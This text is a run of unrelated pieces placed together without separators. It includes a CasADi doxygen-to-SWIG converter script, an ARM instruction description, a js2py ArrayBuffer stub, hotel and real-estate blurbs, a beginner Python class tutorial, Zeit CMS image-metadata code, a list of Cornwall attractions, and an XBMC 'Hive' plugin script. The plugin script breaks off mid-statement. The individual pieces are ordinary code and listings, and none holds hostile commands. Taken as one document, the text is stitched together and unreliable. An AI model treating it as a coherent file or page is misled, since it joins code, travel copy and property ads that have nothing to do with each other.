# # This file is part of CasADi. # # CasADi -- A symbolic framework for dynamic optimization. # Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved. # # CasADi is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 3 of the License, or (at your option) any later version. # # CasADi is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with CasADi; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # from doxy2swig import * import sys import ipdb import texttable def astext(node,whitespace=False,escape=True): r = [] if node.nodeType == node.TEXT_NODE: d = node.data if escape: d = d.replace('\\', r'\\\\') d = d.replace('"', r'\"') if not(whitespace): d = d.strip() r.append(d) elif hasattr(node,'childNodes'): for node in node.childNodes: r.append(astext(node,whitespace=whitespace,escape=escape)) return (" ".join(r)).strip() class Doxy2SWIG_X(Doxy2SWIG): def clean_pieces(self, pieces): """Cleans the list of strings given as `pieces`. It replaces multiple newlines by a maximum of 2 and returns a new list. It also wraps the paragraphs nicely. """ ret = [] count = 0 for i in pieces: if i == '\n': count = count + 1 else: if i == '";': if count: ret.append('\n') elif count > 2: ret.append('\n\n') elif count: ret.append('\n'*count) count = 0 ret.append(i) _data = "".join(ret) ret = [] for i in _data.split('\n\n'): if i == 'Parameters:' or i == 'Exceptions:': ret.extend([i, '\n-----------', '\n\n']) elif i.find('// File:') > -1: # leave comments alone. 
ret.extend([i, '\n']) else: if i.strip().startswith(">"): _tmp = i.strip() else: _tmp = textwrap.fill(i.strip(), 80-4, break_long_words=False) _tmp = self.lead_spc.sub(r'\1"\2', _tmp) ret.extend([_tmp, '\n\n']) return ret def write(self, fname): o = my_open_write(fname) if self.multi: for p in self.pieces: o.write(p.encode("ascii","ignore")) else: for p in self.clean_pieces(self.pieces): o.write(p.encode("ascii","ignore")) o.close() def do_doxygenindex(self, node): self.multi = 1 comps = node.getElementsByTagName('compound') for c in comps: refid = c.attributes['refid'].value fname = refid + '.xml' if not os.path.exists(fname): fname = os.path.join(self.my_dir, fname) if not self.quiet: print "parsing file: %s"%fname p = Doxy2SWIG_X(fname, self.include_function_definition, self.quiet) p.generate() self.pieces.extend(self.clean_pieces(p.pieces)) def do_table(self, node): caption = node.getElementsByTagName("caption") if len(caption)==1: self.add_text(">" + astext(caption[0]).encode("ascii","ignore")+"\n") rows = [] for (i,row) in enumerate(node.getElementsByTagName("row")): rows.append([]) for (j,entry) in enumerate(row.getElementsByTagName("entry")): rows[i].append(astext(entry,escape=False).encode("ascii","ignore")) table = texttable.Texttable(max_width=80-4) table.add_rows(rows) d = table.draw() d = d.replace('\\', r'\\\\') d = d.replace('"', r'\"') self.add_text(d) self.add_text("\n") #print table.draw() #for row in rows: # self.add_text("*") # r = " " # for col in row: # r+=col+" | " # self.add_text(col[:-1]+"\n") #self.generic_parse(node, pad=1) def convert(input, output, include_function_definition=True, quiet=False): p = Doxy2SWIG_X(input, include_function_definition, quiet) p.generate() p.write(output) def main(): usage = __doc__ parser = optparse.OptionParser(usage) parser.add_option("-n", '--no-function-definition', action='store_true', default=False, dest='func_def', help='do not include doxygen function definitions') parser.add_option("-q", '--quiet', 
action='store_true', default=False, dest='quiet', help='be quiet and minimize output') options, args = parser.parse_args() if len(args) != 2: parser.error("error: no input and output specified") convert(args[0], args[1], False, options.quiet) if __name__ == '__main__': main()
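Both `astext` and `do_table` above escape backslashes and double quotes so the drawn text can be embedded inside a SWIG docstring literal. The escaping step in isolation, as a sketch (the sample input is made up):

```python
def escape_for_swig(text):
    # Order matters: escape backslashes first, then double quotes,
    # mirroring the two replace() calls used in astext() and do_table()
    text = text.replace('\\', r'\\\\')
    text = text.replace('"', r'\"')
    return text

escaped = escape_for_swig('path "C:\\tmp"')
```

Doing the quote replacement first would re-escape the backslashes it just inserted, which is why the converter always runs the backslash pass before the quote pass.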
Is a name Cn, with n in the range 0 to 15. System instruction with a result. For more information, see 'Op0 equals 0b01, cache maintenance, TLB maintenance, and address translation instructions' in the Arm Architecture Reference Manual for ARMv8, for the ARMv8-A architecture profile, for the encodings of System instructions.
# this is based on jsarray.py # todo check everything :) from ..base import * try: import numpy except: pass @Js def ArrayBuffer(): a = arguments[0] if isinstance(a, PyJsNumber): length = a.to_uint32() if length!=a.value: raise MakeError('RangeError', 'Invalid array length') temp = Js(bytearray([0]*length)) return temp return Js(bytearray([0])) ArrayBuffer.create = ArrayBuffer ArrayBuffer.own['length']['value'] = Js(None) ArrayBuffer.define_own_property('prototype', {'value': ArrayBufferPrototype, 'enumerable': False, 'writable': False, 'configurable': False}) ArrayBufferPrototype.define_own_property('constructor', {'value': ArrayBuffer, 'enumerable': False, 'writable': False, 'configurable': True})
Property Location: With a stay at Hotel Girassol in Funchal, you'll be convenient to Barreiros Stadium and Madeira Story Centre Museum. This 4-star hotel is within close proximity of Madeira Casino and Formosa Beach. Rooms: Make yourself at home in one of the 134 guestrooms featuring minibars and flat-screen televisions. Rooms have private balconies. High-speed wired Internet access (surcharge) keeps you connected, and cable programming is available for your entertainment. Conveniences include phones and safes, and you can also request rollaway/extra beds. Rec, Spa, Premium Amenities: Be sure to enjoy recreational amenities, including an outdoor pool, a sauna, and a fitness center. Additional features include babysitting/childcare and tour/ticket assistance. Dining: Enjoy a meal at a restaurant, or stay in and take advantage of the hotel's room service during limited hours. Relax with your favorite drink at a bar/lounge or a poolside bar. Business, Other Amenities: Featured amenities include high-speed wired Internet access (surcharge), a 24-hour front desk, and multilingual staff. Event facilities at this hotel consist of conference space and meeting rooms. Free self parking is available onsite.
#!/usr/bin/env python # coding=utf-8 def func1(lens): for i in xrange(lens): print(i) def p1(): print(" ... 1") def p2(): print(" ... 2") def pxx(): print(" ... pxx") # test func def test_func(): print('\n------- test func ------') print("... style 1 ...") func1(3) print("... style 2 ...") f = func1 f(4) # not use: {1:'p1', ...} func_dict = {1: p1, 2:p2, 3:pxx} for x in func_dict.iterkeys(): print('--dict %s' % x) func_dict[x]() # object oriented programming # advanced programming class animal: def __init__(self, name): self.name = name print(self.name) def say_name(self): print(self.name) @staticmethod def say_no_name(): print('static method xxx') @staticmethod def print_help(): print('this is a class for gen animal') def test_animal(): print('\n--- test animal ---') a1 = animal(u'cat') a1.say_name() a1.say_no_name() animal.print_help() animal.say_no_name() class A(): def __init__(self, name): self.name = name print("constructor A was called!") print("name is %s" % self.name) class B(A): def __init__(self, name, age): A.__init__(self, name) self.age = age print("constructor B was called!") print("age is %d" % self.age) class C(B): def __init__(self, name, age): B.__init__(self, name, age) print("constructor C was called!") def test_contructor(): print('\n------- test constructor ------') c = C("ccc", 23) print("c's name is %s" % c.name) print("c's age is %s" % c.age) # if use var '__name', then can't use c.__name outside the class # also for method name, eg: # def __xxx() test_func() test_animal() test_contructor()
In Windsor Bay, there are about 52 homes that benefit from the advantages of belonging to a gated country club. If you have children, they can walk to both Spanish River High School and Omni Middle School. The Windsor Bay subdivision is built around a small lake. Interested in learning more about homes for sale in Windsor Bay at Woodfield Country Club? Read more, or browse through some of our great listings below.
from zeit.cms.content.interfaces import WRITEABLE_ALWAYS import grokcore.component as grok import lxml.objectify import zeit.cms.content.dav import zeit.content.image.interfaces import zeit.content.image.image import zope.component import zope.interface import zope.schema class ImageMetadata(object): zope.interface.implements(zeit.content.image.interfaces.IImageMetadata) zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, zeit.content.image.interfaces.IMAGE_NAMESPACE, ('alt', 'caption', 'links_to', 'nofollow', 'origin')) zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, 'http://namespaces.zeit.de/CMS/document', ('title',)) zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, zeit.content.image.interfaces.IMAGE_NAMESPACE, ('external_id',), writeable=WRITEABLE_ALWAYS) # XXX Since ZON-4106 there should only be one copyright and the api has # been adjusted to 'copyright'. For bw-compat reasons the DAV property is # still called 'copyrights' _copyrights = zeit.cms.content.dav.DAVProperty( zeit.content.image.interfaces.IImageMetadata['copyright'], 'http://namespaces.zeit.de/CMS/document', 'copyrights', use_default=True) @property def copyright(self): value = self._copyrights if not value: return # Migration for exactly one copyright (ZON-4106) if type(value[0]) is tuple: value = value[0] # Migration for nofollow (VIV-104) if len(value) == 2: value = (value[0], None, None, value[1], False) # Migration for companies (ZON-3174) if len(value) == 3: value = (value[0], None, None, value[1], value[2]) return value @copyright.setter def copyright(self, value): self._copyrights = value zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, 'http://namespaces.zeit.de/CMS/meta', ('acquire_metadata',)) def __init__(self, context): self.context = context @zope.interface.implementer(zeit.connector.interfaces.IWebDAVProperties) @zope.component.adapter(ImageMetadata) def 
metadata_webdav_properties(context): return zeit.connector.interfaces.IWebDAVProperties( context.context) @grok.implementer(zeit.content.image.interfaces.IImageMetadata) @grok.adapter(zeit.content.image.interfaces.IImage) def metadata_for_image(image): metadata = ImageMetadata(image) # Be sure to get the image in the repository parent = None if image.uniqueId: image_in_repository = parent = zeit.cms.interfaces.ICMSContent( image.uniqueId, None) if image_in_repository is not None: parent = image_in_repository.__parent__ if zeit.content.image.interfaces.IImageGroup.providedBy(parent): # The image *is* in an image group. if metadata.acquire_metadata is None or metadata.acquire_metadata: group_metadata = zeit.content.image.interfaces.IImageMetadata( parent) if zeit.cms.workingcopy.interfaces.ILocalContent.providedBy(image): for name, field in zope.schema.getFieldsInOrder( zeit.content.image.interfaces.IImageMetadata): value = getattr(group_metadata, name, None) setattr(metadata, name, value) metadata.acquire_metadata = False else: # For repository content return the metadata of the group. metadata = group_metadata return metadata @grok.adapter(zeit.content.image.image.TemporaryImage) @grok.implementer(zeit.content.image.interfaces.IImageMetadata) def metadata_for_synthetic(context): return zeit.content.image.interfaces.IImageMetadata(context.__parent__) class XMLReferenceUpdater(zeit.cms.content.xmlsupport.XMLReferenceUpdater): target_iface = zeit.content.image.interfaces.IImageMetadata def update_with_context(self, entry, context): def set_attribute(name, value): if value: entry.set(name, value) else: entry.attrib.pop(name, None) set_attribute('origin', context.origin) set_attribute('title', context.title) set_attribute('alt', context.alt) # XXX This is really ugly: XMLReference type 'related' uses href for # the uniqueId, but type 'image' uses 'src' or 'base-id' instead, and # reuses 'href' for the link information. 
And since XMLReferenceUpdater # is called for all types of reference, we need to handle both ways. if entry.get('src') or entry.get('base-id'): set_attribute('href', context.links_to) if context.nofollow: set_attribute('rel', 'nofollow') entry['bu'] = context.caption or None for child in entry.iterchildren('copyright'): entry.remove(child) if context.copyright is None: return text, company, freetext, link, nofollow = context.copyright node = lxml.objectify.E.copyright(text) if link: node.set('link', link) if nofollow: node.set('rel', 'nofollow') entry.append(node)
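The `copyright` property in `ImageMetadata` above normalizes legacy DAV values of varying lengths to a single five-tuple `(text, company, freetext, link, nofollow)`. That migration logic in isolation, as a sketch (the sample values are made up):

```python
def normalize_copyright(value):
    """Normalize legacy copyright values to
    (text, company, freetext, link, nofollow)."""
    if not value:
        return None
    # Migration for exactly one copyright (ZON-4106): unwrap nested tuple
    if isinstance(value[0], tuple):
        value = value[0]
    # Migration for nofollow (VIV-104): (text, link)
    if len(value) == 2:
        value = (value[0], None, None, value[1], False)
    # Migration for companies (ZON-3174): (text, link, nofollow)
    if len(value) == 3:
        value = (value[0], None, None, value[1], value[2])
    return value

result = normalize_copyright(('Some Agency', 'http://example.invalid'))
```

A two-element legacy value thus gains `company`, `freetext`, and a default `nofollow=False`, matching what the property returns for current content.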
Most spots are open year round, but do check before you head out. Crealy Adventure Park has thrill rides, hundreds of animals, 40,000 sq ft of indoor play and 35 acres of outdoor play. Healey’s Cyder Farm is family friendly and open all year. Cardinham Wood is mixed woodland for walkers and cyclists, with a great cafe. Bodmin & Wenford Railway, Cornwall’s steam railway. You can hop between Padstow and Rock on the ferry. Eating places abound on both sides of the estuary. A bit further afield you can follow the Fal from Truro to Falmouth or St Mawes and back. St Ives has terrible parking, which has been solved by a great park & ride system on the St Ives Branch Line. You can then reach the Tate and Barbara Hepworth’s house and studio in St Ives. Kayaking, canoeing and SUPing around the magical Fowey estuary with trips from Golant or Fowey harbour. Jump Off a Cliff at the Adrenalin Quarry! The latest mountain biking news from nearby Grogley Woods. And even more bike trails all around us. You’ll see octopuses, sharks and seahorses along with loads of fish at the Blue Reef Aquarium. Always something happening at Newquay Zoo, including big cats, a Madagascan walkthrough and penguins. The Monkey Sanctuary has been caring for unwanted and rescued monkeys for 45 years. Cornish Birds of Prey is close by, and in the other direction you’ll find the Screech Owl Sanctuary and Wildlife Park. You can adopt a lobster – or not – at the National Lobster Hatchery in Padstow. A bit further toward Devon is the Tamar Otter Sanctuary. Cornwall is buzzing at the Porteath Bee Centre. Just over half an hour away is the Porfell Wildlife Park & Sanctuary, established for 25 years. Sharp’s Brewery has a shop at Rock. St Austell Brewery has tours, plus the Hicks Bar, museum and brewery shop, and is 25 minutes away. Other websites for fun, interesting, adventurous things to do – Rain or Shine! www.101-things-to-do-on-a-rainy-day-in-cornwall.co.uk. Lots of ideas for a great day – out of the rain.
www.whatsoncornwall.co.uk. Entertainment, Festivals, Sport, and more.
''' Hive for XBMC Plugin Copyright (C) 2013-2014 ddurdle This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' import xbmc, xbmcgui, xbmcplugin, xbmcaddon import sys import urllib import cgi import re import xbmcvfs # global variables PLUGIN_NAME = 'hive' #helper methods def log(msg, err=False): if err: xbmc.log(addon.getAddonInfo('name') + ': ' + msg, xbmc.LOGERROR) else: xbmc.log(addon.getAddonInfo('name') + ': ' + msg, xbmc.LOGDEBUG) def parse_query(query): queries = cgi.parse_qs(query) q = {} for key, value in queries.items(): q[key] = value[0] q['mode'] = q.get('mode', 'main') return q def addMediaFile(service, package): listitem = xbmcgui.ListItem(package.file.displayTitle(), iconImage=package.file.thumbnail, thumbnailImage=package.file.thumbnail) if package.file.type == package.file.AUDIO: if package.file.hasMeta: infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'date' : package.file.date, 'size' : package.file.size}) else: infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'date' : package.file.date, 'size' : package.file.size }) listitem.setInfo('Music', infolabels) playbackURL = '?mode=audio' elif package.file.type == package.file.VIDEO: infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : 
package.file.plot, 'date' : package.file.date, 'size' : package.file.size }) listitem.setInfo('Video', infolabels) playbackURL = '?mode=video' elif package.file.type == package.file.PICTURE: infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot, 'date' : package.file.date, 'size' : package.file.size }) listitem.setInfo('Pictures', infolabels) playbackURL = '?mode=photo' else: infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot }) listitem.setInfo('Video', infolabels) playbackURL = '?mode=video' listitem.setProperty('IsPlayable', 'true') listitem.setProperty('fanart_image', package.file.fanart) cm=[] try: url = package.getMediaURL() cleanURL = re.sub('---', '', url) cleanURL = re.sub('&', '---', cleanURL) except: cleanURL = '' # url = PLUGIN_URL+'?mode=streamurl&title='+package.file.title+'&url='+cleanURL url = PLUGIN_URL+playbackURL+'&instance='+str(service.instanceName)+'&title='+package.file.title+'&filename='+package.file.id if package.file.isEncoded == False: cm.append(( addon.getLocalizedString(30086), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=requestencoding&instance='+str(service.instanceName)+'&title='+package.file.title+'&filename='+package.file.id+')', )) cm.append(( addon.getLocalizedString(30042), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=buildstrm&username='+str(service.authorization.username)+'&title='+package.file.title+'&filename='+package.file.id+')', )) # cm.append(( addon.getLocalizedString(30046), 'XBMC.PlayMedia('+playbackURL+'&title='+ package.file.title + '&directory='+ package.folder.id + '&filename='+ package.file.id +'&playback=0)', )) # cm.append(( addon.getLocalizedString(30047), 'XBMC.PlayMedia('+playbackURL+'&title='+ package.file.title + '&directory='+ package.folder.id + '&filename='+ package.file.id +'&playback=1)', )) # cm.append(( addon.getLocalizedString(30048), 'XBMC.PlayMedia('+playbackURL+'&title='+ package.file.title + '&directory='+ package.folder.id + 
'&filename='+ package.file.id +'&playback=2)', )) #cm.append(( addon.getLocalizedString(30032), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=download&title='+package.file.title+'&filename='+package.file.id+')', )) # listitem.addContextMenuItems( commands ) # if cm: listitem.addContextMenuItems(cm, False) xbmcplugin.addDirectoryItem(plugin_handle, url, listitem, isFolder=False, totalItems=0) def addDirectory(service, folder): if folder.id == 'SAVED-SEARCH': listitem = xbmcgui.ListItem('Search - ' + decode(folder.displayTitle()), iconImage='', thumbnailImage='') else: listitem = xbmcgui.ListItem(decode(folder.displayTitle()), iconImage=decode(folder.thumb), thumbnailImage=decode(folder.thumb)) fanart = addon.getAddonInfo('path') + '/fanart.jpg' if folder.id != '': cm=[] cm.append(( addon.getLocalizedString(30042), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=buildstrm&title='+folder.title+'&username='+str(service.authorization.username)+'&folderID='+str(folder.id)+')', )) cm.append(( addon.getLocalizedString(30081), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=createbookmark&title='+folder.title+'&instance='+str(service.instanceName)+'&folderID='+str(folder.id)+')', )) listitem.addContextMenuItems(cm, False) listitem.setProperty('fanart_image', fanart) if folder.id == 'SAVED-SEARCH': xbmcplugin.addDirectoryItem(plugin_handle, PLUGIN_URL+'?mode=search&instance='+str(service.instanceName)+'&criteria='+folder.title, listitem, isFolder=True, totalItems=0) else: xbmcplugin.addDirectoryItem(plugin_handle, service.getDirectoryCall(folder), listitem, isFolder=True, totalItems=0) def addMenu(url,title): listitem = xbmcgui.ListItem(decode(title), iconImage='', thumbnailImage='') fanart = addon.getAddonInfo('path') + '/fanart.jpg' listitem.setProperty('fanart_image', fanart) xbmcplugin.addDirectoryItem(plugin_handle, url, listitem, isFolder=True, totalItems=0) #http://stackoverflow.com/questions/1208916/decoding-html-entities-with-python/1208931#1208931 def _callback(matches): id = matches.group(1) try: 
return unichr(int(id)) except: return id def decode(data): return re.sub("&#(\d+)(;|(?=\s))", _callback, data).strip() def decode_dict(data): for k, v in data.items(): if type(v) is str or type(v) is unicode: data[k] = decode(v) return data def numberOfAccounts(accountType): count = 1 max_count = int(addon.getSetting(accountType+'_numaccounts')) actualCount = 0 while True: try: if addon.getSetting(accountType+str(count)+'_username') != '': actualCount = actualCount + 1 except: break if count == max_count: break count = count + 1 return actualCount #global variables PLUGIN_URL = sys.argv[0] plugin_handle = int(sys.argv[1]) plugin_queries = parse_query(sys.argv[2][1:]) addon = xbmcaddon.Addon(id='plugin.video.hive') addon_dir = xbmc.translatePath( addon.getAddonInfo('path') ) import os sys.path.append(os.path.join( addon_dir, 'resources', 'lib' ) ) import hive import cloudservice import folder import file import package import mediaurl import authorization #from resources.lib import gPlayer #from resources.lib import tvWindow #debugging try: remote_debugger = addon.getSetting('remote_debugger') remote_debugger_host = addon.getSetting('remote_debugger_host') # append pydev remote debugger if remote_debugger == 'true': # Make pydev debugger works for auto reload. 
# Note pydevd module need to be copied in XBMC\system\python\Lib\pysrc import pysrc.pydevd as pydevd # stdoutToServer and stderrToServer redirect stdout and stderr to eclipse console pydevd.settrace(remote_debugger_host, stdoutToServer=True, stderrToServer=True) except ImportError: log(addon.getLocalizedString(30016), True) sys.exit(1) except : pass # retrieve settings user_agent = addon.getSetting('user_agent') mode = plugin_queries['mode'] # make mode case-insensitive mode = mode.lower() log('plugin url: ' + PLUGIN_URL) log('plugin queries: ' + str(plugin_queries)) log('plugin handle: ' + str(plugin_handle)) instanceName = '' try: instanceName = (plugin_queries['instance']).lower() except: pass xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL) xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_DATE) xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_SIZE) #* utilities * #clear the authorization token(s) from the identified instanceName or all instances if mode == 'clearauth': if instanceName != '': try: addon.setSetting(instanceName + '_token', '') xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30023)) except: #error: instance doesn't exist pass # clear all accounts else: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: addon.setSetting(instanceName + '_token', '') except: break if count == max_count: break count = count + 1 xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30023)) xbmcplugin.endOfDirectory(plugin_handle) #create strm files elif mode == 'buildstrm': silent = 0 try: silent = int(addon.getSetting('strm_silent')) except: silent = 0 try: silent = int(plugin_queries['silent']) except: pass path = '' try: path = int(plugin_queries['path']) except: pass try: path = str(addon.getSetting('strm_path')) except: pass if path == '': path = 
xbmcgui.Dialog().browse(0,addon.getLocalizedString(30026), 'files','',False,False,'') addon.setSetting('strm_path', path) if path != '': if silent == 0: returnPrompt = xbmcgui.Dialog().yesno(addon.getLocalizedString(30000), addon.getLocalizedString(30027) + '\n'+path + '?') else: returnPrompt = True if path != '' and returnPrompt: if silent != 2: try: pDialog = xbmcgui.DialogProgressBG() pDialog.create(addon.getLocalizedString(30000), 'Building STRMs...') except: pass try: url = plugin_queries['streamurl'] title = plugin_queries['title'] url = re.sub('---', '&', url) except: url='' if url != '': filename = path + '/' + title+'.strm' strmFile = xbmcvfs.File(filename, "w") strmFile.write(url+'\n') strmFile.close() else: try: folderID = plugin_queries['folderID'] title = plugin_queries['title'] except: folderID = '' try: filename = plugin_queries['filename'] title = plugin_queries['title'] except: filename = '' try: invokedUsername = plugin_queries['username'] except: invokedUsername = '' if folderID != '': count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username == invokedUsername: #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 service.buildSTRM(path + '/'+title,folderID) elif filename != '': url = PLUGIN_URL+'?mode=video&title='+title+'&filename='+filename + '&username='+invokedUsername # filename = xbmc.translatePath(os.path.join(path, title+'.strm')) filename = path + '/' + title+'.strm' strmFile = xbmcvfs.File(filename, "w") strmFile.write(url+'\n') strmFile.close() else: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: username = 
addon.getSetting(instanceName+'_username') except: username = '' if username != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) service.buildSTRM(path + '/'+username) if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 if silent != 2: try: pDialog.update(100) except: pass if silent == 0: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30028)) xbmcplugin.endOfDirectory(plugin_handle) #create strm files elif mode == 'createbookmark': try: folderID = plugin_queries['folderID'] title = plugin_queries['title'] instanceName = plugin_queries['instance'] except: folderID = '' if folderID != '': try: username = addon.getSetting(instanceName+'_username') except: username = '' if username != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) newTitle = '' try: dialog = xbmcgui.Dialog() newTitle = dialog.input('Enter a name for the bookmark', title, type=xbmcgui.INPUT_ALPHANUM) except: newTitle = title if newTitle == '': newTitle = title service.createBookmark(folderID,newTitle) xbmcplugin.endOfDirectory(plugin_handle) #create strm files elif mode == 'createsearch': searchText = '' try: searchText = addon.getSetting('criteria') except: searchText = '' if searchText == '': try: dialog = xbmcgui.Dialog() searchText = dialog.input('Enter search string', type=xbmcgui.INPUT_ALPHANUM) except: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30100)) searchText = 'life' if searchText != '': instanceName = '' try: instanceName = (plugin_queries['instance']).lower() except: pass numberOfAccounts = numberOfAccounts(PLUGIN_NAME) # show list of services if numberOfAccounts > 1 and instanceName == '': count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': 
addMenu(PLUGIN_URL+'?mode=main&instance='+instanceName,username) except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 else: # show index of accounts if instanceName == '' and numberOfAccounts == 1: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 # no accounts defined elif numberOfAccounts == 0: #legacy account conversion try: username = addon.getSetting('username') if username != '': addon.setSetting(PLUGIN_NAME+'1_username', username) addon.setSetting(PLUGIN_NAME+'1_password', addon.getSetting('password')) addon.setSetting(PLUGIN_NAME+'1_auth_token', addon.getSetting('auth_token')) addon.setSetting(PLUGIN_NAME+'1_auth_session', addon.getSetting('auth_session')) addon.setSetting('username', '') addon.setSetting('password', '') addon.setSetting('auth_token', '') addon.setSetting('auth_session', '') else: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) except : xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) # show entries of a single account (such as folder) elif instanceName != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), 
addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(addon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) service.createSearch(searchText) mediaItems = service.getSearchResults(searchText) if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) service.updateAuthorization(addon) xbmcplugin.endOfDirectory(plugin_handle) numberOfAccounts = numberOfAccounts(PLUGIN_NAME) try: invokedUsername = plugin_queries['username'] except: invokedUsername = '' # show list of services if numberOfAccounts > 1 and instanceName == '' and invokedUsername == '': if mode == 'main': mode = '' count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': addMenu(PLUGIN_URL+'?mode=main&instance='+instanceName,username) try: service except: service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 else: # show index of accounts if instanceName == '' and invokedUsername == '' and numberOfAccounts == 1: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 # no accounts defined elif numberOfAccounts == 0: #legacy account conversion try: username = addon.getSetting('username') if username != 
'': addon.setSetting(PLUGIN_NAME+'1_username', username) addon.setSetting(PLUGIN_NAME+'1_password', addon.getSetting('password')) addon.setSetting(PLUGIN_NAME+'1_auth_token', addon.getSetting('auth_token')) addon.setSetting(PLUGIN_NAME+'1_auth_session', addon.getSetting('auth_session')) addon.setSetting('username', '') addon.setSetting('password', '') addon.setSetting('auth_token', '') addon.setSetting('auth_session', '') else: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) except : xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) # show entries of a single account (such as folder) elif instanceName != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) elif invokedUsername != '': count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username == invokedUsername: #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 if mode == 'main': 